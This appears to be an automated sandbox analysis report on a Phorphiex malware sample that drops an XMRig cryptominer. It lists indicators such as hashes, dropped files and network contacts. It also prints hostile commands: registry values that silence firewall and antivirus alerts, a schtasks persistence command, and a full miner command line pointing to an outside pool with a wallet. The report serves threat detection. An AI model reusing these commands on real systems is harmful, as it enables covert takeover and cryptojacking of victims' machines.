Analysis Overview
SHA256
c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d
Threat Level: Known bad
The file c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d was found to be: Known bad.
Malicious Activity Summary
Phorphiex family
xmrig
Windows security bypass
Phorphiex
XMRig Miner payload
Executes dropped EXE
Downloads MZ/PE file
Windows security modification
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in Windows directory
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-12 15:55
Signatures
Phorphiex family
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-12 15:55
Reported
2022-08-12 15:57
Platform
win10-20220722-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\wklopsvcs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\612732430.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1740120124.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\516319480.exe | N/A |
| N/A | N/A | C:\Windows\wcdsemgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1533620072.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\47587152.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2314210268.exe | N/A |
| N/A | N/A | C:\Users\Admin\wincsvns.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wklopsvcs.exe" | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wcdsemgr.exe" | C:\Users\Admin\AppData\Local\Temp\516319480.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 220 set thread context of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| File opened for modification | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| File created | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\516319480.exe | N/A |
| File opened for modification | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\516319480.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe
"C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe"
C:\Windows\wklopsvcs.exe
C:\Windows\wklopsvcs.exe
C:\Users\Admin\AppData\Local\Temp\612732430.exe
C:\Users\Admin\AppData\Local\Temp\612732430.exe
C:\Users\Admin\AppData\Local\Temp\1740120124.exe
C:\Users\Admin\AppData\Local\Temp\1740120124.exe
C:\Users\Admin\AppData\Local\Temp\516319480.exe
C:\Users\Admin\AppData\Local\Temp\516319480.exe
C:\Windows\wcdsemgr.exe
C:\Windows\wcdsemgr.exe
C:\Users\Admin\AppData\Local\Temp\1533620072.exe
C:\Users\Admin\AppData\Local\Temp\1533620072.exe
C:\Users\Admin\AppData\Local\Temp\47587152.exe
C:\Users\Admin\AppData\Local\Temp\47587152.exe
C:\Users\Admin\AppData\Local\Temp\2314210268.exe
C:\Users\Admin\AppData\Local\Temp\2314210268.exe
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2314210268.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "wincsvns" /tr "C:\Users\Admin\wincsvns.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "wincsvns" /tr "C:\Users\Admin\wincsvns.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\wincsvns.exe"
C:\Users\Admin\wincsvns.exe
C:\Users\Admin\wincsvns.exe
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\wincsvns.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\System32\svchost.exe
C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=185.215.113.84:8586 --user=43RrFTp7myuC9LHNDXFDm2H49Qfp5iMfbLjcbVEmKv5qdoP5vqJyKnrHixqv2QPEtW2jBjeAXzBgtjbzkNNg47Zw1DH2D2H --pass=x --cpu-max-threads-hint=40 --cinit-idle-wait=10 --cinit-idle-cpu=80
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
Network
| Country | Destination | Domain | Proto |
| FR | 51.11.192.48:443 | tcp | |
| US | 13.107.4.50:80 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| N/A | 10.231.50.30:40500 | udp | |
| IR | 37.255.124.89:40500 | tcp | |
| UZ | 62.209.132.199:40500 | udp | |
| EG | 154.237.114.27:40500 | udp | |
| UZ | 80.80.222.89:40500 | udp | |
| MX | 187.200.76.99:40500 | udp | |
| SY | 82.137.244.49:40500 | udp | |
| RU | 95.163.189.237:40500 | tcp | |
| GE | 178.236.57.16:40500 | udp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| IR | 37.255.195.231:40500 | udp | |
| IN | 45.248.160.159:40500 | tcp | |
| IN | 117.206.43.166:40500 | udp | |
| PK | 39.53.176.26:40500 | udp | |
| IR | 151.234.138.54:40500 | udp | |
| AZ | 91.242.14.27:40500 | udp | |
| IR | 31.56.142.196:40500 | udp | |
| IR | 87.107.151.80:40500 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| DZ | 41.96.28.194:40500 | udp | |
| US | 69.67.151.23:40500 | udp | |
| UZ | 213.230.71.54:40500 | udp | |
| RU | 2.61.9.253:40500 | udp | |
| IN | 117.201.169.74:40500 | udp | |
| AO | 154.65.244.161:40500 | tcp | |
| YE | 178.130.94.154:40500 | udp | |
| RU | 185.215.113.84:8586 | tcp |
Files
memory/4956-127-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-128-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-129-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-130-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-131-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-132-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-133-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-134-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-135-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-136-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-137-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-138-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-139-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-140-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-141-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-142-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-143-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-144-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-145-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-146-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-147-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-148-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-149-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-150-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-151-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-152-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-154-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-153-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-155-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-156-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-157-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-158-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-159-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-160-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-161-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-162-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-163-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-164-0x0000000077E40000-0x0000000077FCE000-memory.dmp
C:\Windows\wklopsvcs.exe
| MD5 | 209baf40779b80d5e443c3dbbd656bfb |
| SHA1 | b64fa8dded031d5dacac519a2035cefcd05e6503 |
| SHA256 | c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d |
| SHA512 | 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e |
memory/1868-165-0x0000000000000000-mapping.dmp
memory/1868-167-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-168-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-169-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-170-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-171-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-172-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-173-0x0000000077E40000-0x0000000077FCE000-memory.dmp
C:\Windows\wklopsvcs.exe
| MD5 | 209baf40779b80d5e443c3dbbd656bfb |
| SHA1 | b64fa8dded031d5dacac519a2035cefcd05e6503 |
| SHA256 | c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d |
| SHA512 | 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e |
memory/1868-175-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-176-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-177-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-178-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-179-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-180-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-181-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-182-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-183-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-184-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-185-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-186-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-187-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-188-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-189-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-190-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-191-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-193-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-192-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/3416-215-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\612732430.exe
| MD5 | c8a69840ffff790ea975bb0cf55f7f4d |
| SHA1 | dd1c74f0eb2fc813d16c96669e22fb657b67c4b3 |
| SHA256 | e532a8c62dbf01fecc09896f376e689ee836c5498ff24586ed142f72cfd174dc |
| SHA512 | df22b912e15640cd1c5f91908e1e2d2b4fc7be27d54415fd2c0ba5f0de83a785662b67912e4513e13fde30abab4082763d4dd6e65ddc2cdfe47bbe6ee40d249a |
C:\Users\Admin\AppData\Local\Temp\612732430.exe
| MD5 | c8a69840ffff790ea975bb0cf55f7f4d |
| SHA1 | dd1c74f0eb2fc813d16c96669e22fb657b67c4b3 |
| SHA256 | e532a8c62dbf01fecc09896f376e689ee836c5498ff24586ed142f72cfd174dc |
| SHA512 | df22b912e15640cd1c5f91908e1e2d2b4fc7be27d54415fd2c0ba5f0de83a785662b67912e4513e13fde30abab4082763d4dd6e65ddc2cdfe47bbe6ee40d249a |
memory/3148-255-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1740120124.exe
| MD5 | a475e43527d7dc7d6f2d23bad64fcc99 |
| SHA1 | 793a7625c0106d6cd79d060b4eec94e58530833e |
| SHA256 | f97c43bf3dce6180e658f2c3776e31cf52472b28ac8249be4d307880b6405eeb |
| SHA512 | 4af57a218d7d790b5ec4581dd2bc941deff05ea11bf6054a9d268c054af421977cdd68d5090884358208925f50023c97e9cfaba0831d72e9bcdcca729447d900 |
C:\Users\Admin\AppData\Local\Temp\1740120124.exe
| MD5 | a475e43527d7dc7d6f2d23bad64fcc99 |
| SHA1 | 793a7625c0106d6cd79d060b4eec94e58530833e |
| SHA256 | f97c43bf3dce6180e658f2c3776e31cf52472b28ac8249be4d307880b6405eeb |
| SHA512 | 4af57a218d7d790b5ec4581dd2bc941deff05ea11bf6054a9d268c054af421977cdd68d5090884358208925f50023c97e9cfaba0831d72e9bcdcca729447d900 |
memory/4476-292-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\516319480.exe
| MD5 | 5741eadfc89a1352c61f1ff0a5c01c06 |
| SHA1 | cdff6ddd67f17385f283a0f9e8de76731f11a9b6 |
| SHA256 | ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3 |
| SHA512 | 08104893c726e06c6fe7687394d084365b72cf19e821be0d7a1b094c9a0d54ccea65fd01ea33a1f507680d21c6f98e62e2d765b4a0ce3b3d8d458063bd375063 |
C:\Users\Admin\AppData\Local\Temp\516319480.exe
| MD5 | 5741eadfc89a1352c61f1ff0a5c01c06 |
| SHA1 | cdff6ddd67f17385f283a0f9e8de76731f11a9b6 |
| SHA256 | ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3 |
| SHA512 | 08104893c726e06c6fe7687394d084365b72cf19e821be0d7a1b094c9a0d54ccea65fd01ea33a1f507680d21c6f98e62e2d765b4a0ce3b3d8d458063bd375063 |
memory/2016-333-0x0000000000000000-mapping.dmp
C:\Windows\wcdsemgr.exe
| MD5 | 5741eadfc89a1352c61f1ff0a5c01c06 |
| SHA1 | cdff6ddd67f17385f283a0f9e8de76731f11a9b6 |
| SHA256 | ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3 |
| SHA512 | 08104893c726e06c6fe7687394d084365b72cf19e821be0d7a1b094c9a0d54ccea65fd01ea33a1f507680d21c6f98e62e2d765b4a0ce3b3d8d458063bd375063 |
C:\Windows\wcdsemgr.exe
| MD5 | 5741eadfc89a1352c61f1ff0a5c01c06 |
| SHA1 | cdff6ddd67f17385f283a0f9e8de76731f11a9b6 |
| SHA256 | ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3 |
| SHA512 | 08104893c726e06c6fe7687394d084365b72cf19e821be0d7a1b094c9a0d54ccea65fd01ea33a1f507680d21c6f98e62e2d765b4a0ce3b3d8d458063bd375063 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\WLUPZK3F\2[1]
| MD5 | 573584190b9ae1f05e0b40591df933c4 |
| SHA1 | 412fe72d4eb447ac1744bea4a35360703b1fb110 |
| SHA256 | 85348184c11fe6ea7866ab07f01a7acdd189b0c349b2775f1d28f188b45fa074 |
| SHA512 | cc33f657047478259fb4ff1d610b9e8adf55744aa4a0a015413cf2747b11992c4d2d5df9d449690c1d28d905e92e93f2b915edf51e8361973018b17bfad496d4 |
memory/4912-384-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1533620072.exe
| MD5 | c8a69840ffff790ea975bb0cf55f7f4d |
| SHA1 | dd1c74f0eb2fc813d16c96669e22fb657b67c4b3 |
| SHA256 | e532a8c62dbf01fecc09896f376e689ee836c5498ff24586ed142f72cfd174dc |
| SHA512 | df22b912e15640cd1c5f91908e1e2d2b4fc7be27d54415fd2c0ba5f0de83a785662b67912e4513e13fde30abab4082763d4dd6e65ddc2cdfe47bbe6ee40d249a |
C:\Users\Admin\AppData\Local\Temp\1533620072.exe
| MD5 | c8a69840ffff790ea975bb0cf55f7f4d |
| SHA1 | dd1c74f0eb2fc813d16c96669e22fb657b67c4b3 |
| SHA256 | e532a8c62dbf01fecc09896f376e689ee836c5498ff24586ed142f72cfd174dc |
| SHA512 | df22b912e15640cd1c5f91908e1e2d2b4fc7be27d54415fd2c0ba5f0de83a785662b67912e4513e13fde30abab4082763d4dd6e65ddc2cdfe47bbe6ee40d249a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\CNLYUSDZ\3[1]
| MD5 | 9e2f163c15ee457be1f51981985570a1 |
| SHA1 | 4a191e6da4a85b915f285e758d0789d2ede3aff1 |
| SHA256 | c7de55ddd548f4f268979e1f0c70ab0edb2566c0ce46b921ea281e1570abad82 |
| SHA512 | 4b3eae4a1df79ac8805f46d32daecdb54028d160a5056679d4478c08e7f8ff42df5f84f4b1fe2cb8b5f3574eae5b18a94ad865edfc4d314a51118316c907967d |
C:\Users\Admin\tncmds.dat
| MD5 | 07872b17cfd93a2792bd0b17f5c07002 |
| SHA1 | 7de2ee0b5255ecc6720fb91cae5e51af20a0e4c5 |
| SHA256 | 44a3fbe34f99b539d55342fc99c33a9d5c6da95bfc765d94c47eb64ecbdbede0 |
| SHA512 | f6c519a48afd92a1eee0f6e4efdf9f0c0cd6104e7edae202aee33d1d8036be3be681032383c0b36fd1ca71ae53600d55b05bb736410f905de06b0f5364d64d37 |
memory/2480-426-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\47587152.exe
| MD5 | a475e43527d7dc7d6f2d23bad64fcc99 |
| SHA1 | 793a7625c0106d6cd79d060b4eec94e58530833e |
| SHA256 | f97c43bf3dce6180e658f2c3776e31cf52472b28ac8249be4d307880b6405eeb |
| SHA512 | 4af57a218d7d790b5ec4581dd2bc941deff05ea11bf6054a9d268c054af421977cdd68d5090884358208925f50023c97e9cfaba0831d72e9bcdcca729447d900 |
C:\Users\Admin\AppData\Local\Temp\47587152.exe
| MD5 | a475e43527d7dc7d6f2d23bad64fcc99 |
| SHA1 | 793a7625c0106d6cd79d060b4eec94e58530833e |
| SHA256 | f97c43bf3dce6180e658f2c3776e31cf52472b28ac8249be4d307880b6405eeb |
| SHA512 | 4af57a218d7d790b5ec4581dd2bc941deff05ea11bf6054a9d268c054af421977cdd68d5090884358208925f50023c97e9cfaba0831d72e9bcdcca729447d900 |
C:\Users\Admin\tnnodes.dat
| MD5 | a2eb00e16d2d222a9b15cd0c565ad9a0 |
| SHA1 | 3a3a0658f5a0395f7b3b175d0bdb2e30a1e53414 |
| SHA256 | 1c93017a92d9c60f2687e0bf497f780440bc4626121adcac6c92c0194e5762e8 |
| SHA512 | b5c0030c3982e56203a840899242ed009054843a450eb33a31da4683d81a5f84d5a4af1ec742d786c58141df29b4289f33f326038ccc38b46f214f9e12e4e9fa |
memory/1908-474-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\2314210268.exe
| MD5 | 7990f0feb5dd2934aef2d546fd782a07 |
| SHA1 | 7a10b7a22b964bd76effdbdc799098481fa72102 |
| SHA256 | 584453b0ac50b6c6ca75aa0698ff3593c393709ad8b18f2708c6440528e8b7a1 |
| SHA512 | d87d7db1095e9a382c396c75d69c9b0e3634ca88d6dd52005afa9a35a2f40439dee7d8c84cb336d51f27578880fa77c587edf62956471d332687be519136ca18 |
C:\Users\Admin\AppData\Local\Temp\2314210268.exe
| MD5 | 7990f0feb5dd2934aef2d546fd782a07 |
| SHA1 | 7a10b7a22b964bd76effdbdc799098481fa72102 |
| SHA256 | 584453b0ac50b6c6ca75aa0698ff3593c393709ad8b18f2708c6440528e8b7a1 |
| SHA512 | d87d7db1095e9a382c396c75d69c9b0e3634ca88d6dd52005afa9a35a2f40439dee7d8c84cb336d51f27578880fa77c587edf62956471d332687be519136ca18 |
memory/4644-481-0x000001D5EFD60000-0x000001D5EFF80000-memory.dmp
memory/4644-483-0x000001D5D7270000-0x000001D5D7282000-memory.dmp
memory/4812-485-0x0000000000000000-mapping.dmp
memory/1784-486-0x0000000000000000-mapping.dmp
memory/4644-487-0x000001D5D5290000-0x000001D5D54B0000-memory.dmp
memory/4216-488-0x0000000000000000-mapping.dmp
memory/224-490-0x0000000000000000-mapping.dmp
C:\Users\Admin\wincsvns.exe
| MD5 | 7990f0feb5dd2934aef2d546fd782a07 |
| SHA1 | 7a10b7a22b964bd76effdbdc799098481fa72102 |
| SHA256 | 584453b0ac50b6c6ca75aa0698ff3593c393709ad8b18f2708c6440528e8b7a1 |
| SHA512 | d87d7db1095e9a382c396c75d69c9b0e3634ca88d6dd52005afa9a35a2f40439dee7d8c84cb336d51f27578880fa77c587edf62956471d332687be519136ca18 |
C:\Users\Admin\wincsvns.exe
| MD5 | 7990f0feb5dd2934aef2d546fd782a07 |
| SHA1 | 7a10b7a22b964bd76effdbdc799098481fa72102 |
| SHA256 | 584453b0ac50b6c6ca75aa0698ff3593c393709ad8b18f2708c6440528e8b7a1 |
| SHA512 | d87d7db1095e9a382c396c75d69c9b0e3634ca88d6dd52005afa9a35a2f40439dee7d8c84cb336d51f27578880fa77c587edf62956471d332687be519136ca18 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
| MD5 | 84f2160705ac9a032c002f966498ef74 |
| SHA1 | e9f3db2e1ad24a4f7e5c203af03bbc07235e704c |
| SHA256 | 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93 |
| SHA512 | f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57 |
memory/4076-504-0x0000000000000000-mapping.dmp
